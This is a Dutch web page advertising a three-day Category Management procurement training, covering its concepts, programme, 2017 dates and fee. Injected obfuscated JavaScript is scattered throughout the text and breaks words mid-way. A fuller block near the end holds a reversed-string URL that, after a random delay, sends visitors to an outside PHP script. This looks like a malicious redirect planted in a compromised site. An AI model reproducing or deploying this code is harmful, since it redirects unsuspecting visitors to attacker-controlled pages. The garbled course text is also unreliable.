+ Category Management

Waar de traditionele inkooporganisaties vaak de focus hebben op kostenbesparingen, richt Category Management zich op het optimale uit de markt halen. Category Management is gericht op het inkopen van resultaat voor de organisatie, op de meest optimale wijze. Omdat er direct wordt aangesloten op de strategie en doelen van de Business leidt Category Management dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een betere integratie en acceptatie van inkoop in de organisatie.

Category Management: het managen van inkoopcategorieën

Category Management begint met het indelen van de ingekochte producten en diensten in “categorieën” van soortgelijke of aanverwante producten op een dusdanige manier dat dit past bij de interne organisatie en de leveranciersmarkt. Deze categorieën worden vervolgens “gemanaged” als ware het een Business Unit, waarbij het optimale uit de markt gehaald moet worden om de doelen van de business en de klant te bereiken.

category-management-click

+ Category Strategy

Hoe de doelen van de business bereikt gaan worden wordt weergegeven in de Category Strategy. Dit is een uitgebreide analyse van de interne en externe markt, uitmondend in een concreet plan, dat beschrijft op welke wijze de gestelde doelen bereikt gaan worden. Het op deze wijze bij elkaar brengen van producten, diensten, interne- en  externe markt, strategieën en markdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tontwikkelingen leidt dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot de identificatie van verbetermogelijkheden en het op optimale wijze bijdragen aan de doelen van de business. Hierbij komt ook zeker de implementatie aan de orde, zodat vooraf al duidelijk is wat er concreet in de praktijk moet gebeuren om de doelen te bereiken, wat hierbij de planning is en wie daarin welke rol, taken en verantwoordelijkheden heeft.

incompany trajecten

De opleiding  

De opleiding Category Management wordt zowel inhouse als als open training gegeven. De deelnemers leren wat het managen van een categorie inhoudt en hoe van categoriedefinitie te komen dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een concreet plan. Belangrijk is het inzicht in de betekenis voor de organisatie en hoe het in de praktijk dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepasbaar is. Hierdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe zal continue de koppeling worden gelegd tussen de theoretische modellen en de dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassing in de praktijk waarbij een hdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andboek van dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools en templates en best practices zal worden opgebouwd. De opleiding zal worden afgesloten met een Category Strategy of Category Plan dat gedurende de opleiding wordt gemaakt en gebaseerd is op de praktijksituatie van de individuele deelnemer.

+Resultaat:

Na de opleiding heeft de deelnemer:

 • de benodigde kennis om een artikelcategorie te managen op een wijze die aansluit bij de behoeften van de klant
 • inzicht in hoe je de wensen en eisen van de klant kunt omzetten in een Category Strategy
 • de dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools om een Category Strategy om te zetten in concrete acties en resultaat
 • zelf een Category Strategy gemaakt voor zijn/haar eigen praktijksituatie
 • een hdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andboek met dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tools, templates en best practices

+Programma

De opleiding beslaat 3 dagen (of 6 dagdelen á 3,5 uur) plenair, verspreid over drie madom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anden en optioneel per deelnemer 1 dag (4 x 2uur) persoonlijke begeleiding bij het maken van het plan.

Dagdeel 1 en 2:  Inleiding dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot Category Management

 • Inkooporganisatievormen en werkwijzen
 • Volwassenheid fasen bij inkooporganisaties
 • Wat is Category Management, wat is een Category Strategy
 • Hoe bepaal je een artikel categorie
 • Hoe analyseer je de uitgaven
 • Stakeholder management

 Dagdeel 3 en 4:  Interne en externe analyse

 • Het bepalen van de requirements
 • Het analyseren van de requirements
 • Hoe bepaal je de cost drivers
 • Hoe analyseer je een prijs en prijstrends
 • Wat is een cost model
 • Hoe analyseer je de huidige leveranciers.
 • externe analyse: markt en supply chain
 • Aansluiten op de business

Dagdeel 5 en 6:  Het bepalen en implementeren van de strategie

 • Hoe bepaal je de portfolio strategie
 • Hoe vertaal je dit in een concrete inkoopstrategie
 • Op welke manier link je deze aan organisatie strategie, doelstelling en prioriteiten
 • Category teams
 • Het bepalen van de Kritische Succes Facdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toren voor de strategie
 • Hoe implementeer je een strategie
 • Business case
 • Risicomanagement

Deze opleiding kan op maat  worden aangepast aan de situatie van uw bedrijf en zal een interactief karakter hebben, waarbij de behoeften uit de groep de diepgang van een onderwerp bepalen.

inkopers

Inschrijven voor de open training Category Management:

De training Category Management is een inhouse inkooptraining en wordt ook als open training gegeven. De volgende data waarop deze training wordt gegeven zijn: 4 okdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tober, 8 november en 13 december 2017. Je gaat met een nieuw en modern category plan 2018 in!  De kosten zijn 1950 Euro per deelnemer. Wil je je inschrijven voor een open training? Vul het formulier hieronder in of klik op inschrijven

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top_padding="80" botdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_padding="80" bg_position="left dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top"]

Inschrijven

[contact-form-7 404 "Niet gevonden"]
Ontvang gratis de nieuwsbrief

Blijf op de hoogte van de laatste ontwikkelingen tussen inkoop en verkoop

SCHRIJF U GRATIS IN